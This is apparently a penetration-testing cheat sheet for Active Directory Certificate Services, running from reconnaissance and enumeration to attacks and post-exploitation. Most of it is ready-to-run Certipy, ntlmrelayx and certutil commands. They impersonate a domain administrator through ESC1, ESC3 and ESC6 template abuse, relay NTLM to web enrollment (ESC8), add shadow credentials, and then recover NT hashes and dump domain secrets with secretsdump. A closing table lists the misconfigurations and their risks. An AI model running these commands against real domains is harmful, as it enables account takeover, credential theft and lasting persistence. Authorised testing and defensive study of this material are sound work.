AD CS (Active Directory Certificate Services)
Default Ports: 80/443, 135, 445, 389/636, 88
Active Directory Certificate Services (AD CS) issues certificates in Windows domains. In pentests, AD CS misconfigurations can allow certificate-based privilege escalation, account impersonation, NTLM relay, and long-lived domain persistence.
Connect
Using Certipy
Certipy is the main AD CS enumeration and abuse tool.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -text -json -csv -output adcs
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable
Using LDAP
AD CS objects live in the Configuration naming context.
ldapsearch -x -H ldap://dc.domain.local -D 'DOMAIN\user' -w 'Password123' \
-b 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local' \
'(objectClass=pKIEnrollmentService)'
ldapsearch -x -H ldap://dc.domain.local -D 'DOMAIN\user' -w 'Password123' \
-b 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local' \
'(objectClass=pKICertificateTemplate)'
Using Windows Tools
Native tools validate CA and template visibility from a Windows host.
certutil -config - -ping
certutil -config "CAHOST\CA-NAME" -getconfig
certutil -template
certreq -submit -config "CAHOST\CA-NAME" request.inf
Web Enrollment
Web Enrollment is important for relay and legacy enrollment testing.
curl -I http://ca.domain.local/certsrv/
curl -I https://ca.domain.local/certsrv/
curl -I http://ca.domain.local/certsrv/certfnsh.asp
curl -I http://ca.domain.local/certsrv/mscep/mscep.dll
curl -I http://ca.domain.local/certsrv/mscep_admin/
Recon
Service Detection with Nmap
Scan CA hosts for web, RPC, LDAP, SMB, and Kerberos exposure.
nmap -p 80,443,88,135,139,389,445,464,593,636,3268,3269 -sV ca.domain.local
nmap -p 80,443 --script http-title,http-headers,http-auth ca.domain.local
nmap -p 135 --script msrpc-enum ca.domain.local
nmap -p 389 --script ldap-rootdse dc.domain.local
CA Discovery
The first goal is to identify Enterprise CAs trusted by the domain.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -text -output adcs
grep -Ei 'CA Name|DNS Name|Certificate Subject|Web Enrollment|User Specified SAN' adcs.txt
Template Discovery
Templates define who can request certificates and what identities they can contain.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -json -output adcs
grep -Ei 'Template Name|Enrollment Rights|Client Authentication|Enrollee Supplies Subject|Manager Approval' adcs.txt
Web Endpoint Discovery
Identify /certsrv/, CES, CEP, and NDES endpoints.
ffuf -u http://ca.domain.local/FUZZ -w wordlist.txt -mc all
curl -I http://ca.domain.local/certsrv/
curl -I http://ca.domain.local/ADPolicyProvider_CEP_UsernamePassword/service.svc
curl -I http://ca.domain.local/CertSrv/mscep/mscep.dll
Enumeration
Template Permission Enumeration
Check which users or groups can enroll in each template.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -enabled -text
grep -Ei 'Enrollment Rights|Extended Rights|Write Owner|Write Dacl|Write Property' adcs.txt
Vulnerable Template Enumeration
Use Certipy to highlight ESC-style template issues.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -text -output vulnerable-adcs
cat vulnerable-adcs.txt
Web Enrollment Enumeration
Check whether web enrollment requires NTLM and whether HTTPS is enforced.
curl -I http://ca.domain.local/certsrv/
curl -I --ntlm -u 'DOMAIN\user:Password123' http://ca.domain.local/certsrv/
nmap -p 80,443 --script http-ntlm-info ca.domain.local
CA Configuration Enumeration
CA settings affect approval, request handling, and web enrollment risk.
certutil -config "CAHOST\CA-NAME" -getreg CA
certutil -config "CAHOST\CA-NAME" -getreg policy
certutil -config "CAHOST\CA-NAME" -catemplates
Attack Vectors
ESC1 User-Supplied SAN
Templates that allow client auth and user-supplied SAN can enable impersonation.
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template VulnerableTemplate -upn administrator@domain.local -dc-ip 10.0.0.10
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
ESC2 Any Purpose Template
Any Purpose or broad EKU templates may be usable for authentication.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template AnyPurposeTemplate -dc-ip 10.0.0.10
ESC3 Enrollment Agent
Enrollment agent certificates can request certificates on behalf of other users.
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template EnrollmentAgentTemplate -dc-ip 10.0.0.10
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template UserTemplate -on-behalf-of domain\\administrator -pfx user.pfx -dc-ip 10.0.0.10
ESC4 Template ACL Abuse
Write permissions on templates can turn a safe template into an unsafe one.
certipy template -u user@domain.local -p 'Password123' -template TemplateName -save-old -dc-ip 10.0.0.10
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable
ESC6 CA SAN Flag
CA-level SAN settings may allow SAN abuse even when templates look safe.
certutil -config "CAHOST\CA-NAME" -getreg policy\EditFlags
certipy req -u user@domain.local -p 'Password123' -ca CA-NAME -template User -upn administrator@domain.local -dc-ip 10.0.0.10
ESC8 NTLM Relay to Web Enrollment
HTTP enrollment endpoints that accept NTLM can be relay targets.
certipy relay -ca ca.domain.local -template DomainController
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
Shadow Credentials
Certificate-based persistence may be possible through msDS-KeyCredentialLink.
certipy shadow add -u user@domain.local -p 'Password123' -account targetuser -dc-ip 10.0.0.10
certipy auth -pfx targetuser.pfx -dc-ip 10.0.0.10
Post-Exploitation
Certificate Authentication
Use issued certificates to request TGTs or authenticate as the target account.
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
export KRB5CCNAME=administrator.ccache
NT Hash Extraction
Certificate authentication can often recover NT hashes.
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
secretsdump.py -k -no-pass domain.local/administrator@dc.domain.local
Persistence Review
Certificates may remain valid after password changes.
certipy cert -pfx administrator.pfx -info
certutil -dump administrator.pfx
Evidence Collection
Save CA, template, and vulnerable finding outputs.
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.0.0.10 -text -json -csv -output adcs-evidence
Useful Tools
| Tool | Purpose |
|---|---|
certipy | AD CS enumeration and abuse |
certutil | Native Windows CA checks |
certreq | Native certificate requests |
ldapsearch | LDAP enumeration |
nmap | Service and endpoint checks |
ntlmrelayx.py | NTLM relay to AD CS |
openssl | Certificate inspection |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| User-supplied SAN with client auth | Account impersonation |
| Broad enrollment rights | Low-privilege certificate abuse |
| Weak template ACLs | Template takeover |
| Enrollment Agent abuse | Request certificates for other users |
| NTLM Web Enrollment | Relay to certificate issuance |
| Dangerous CA flags | CA-wide impersonation paths |
| Missing manager approval | Automated certificate abuse |
| Long certificate validity | Long-lived persistence |
| Weak monitoring | Certificate abuse is harder to detect |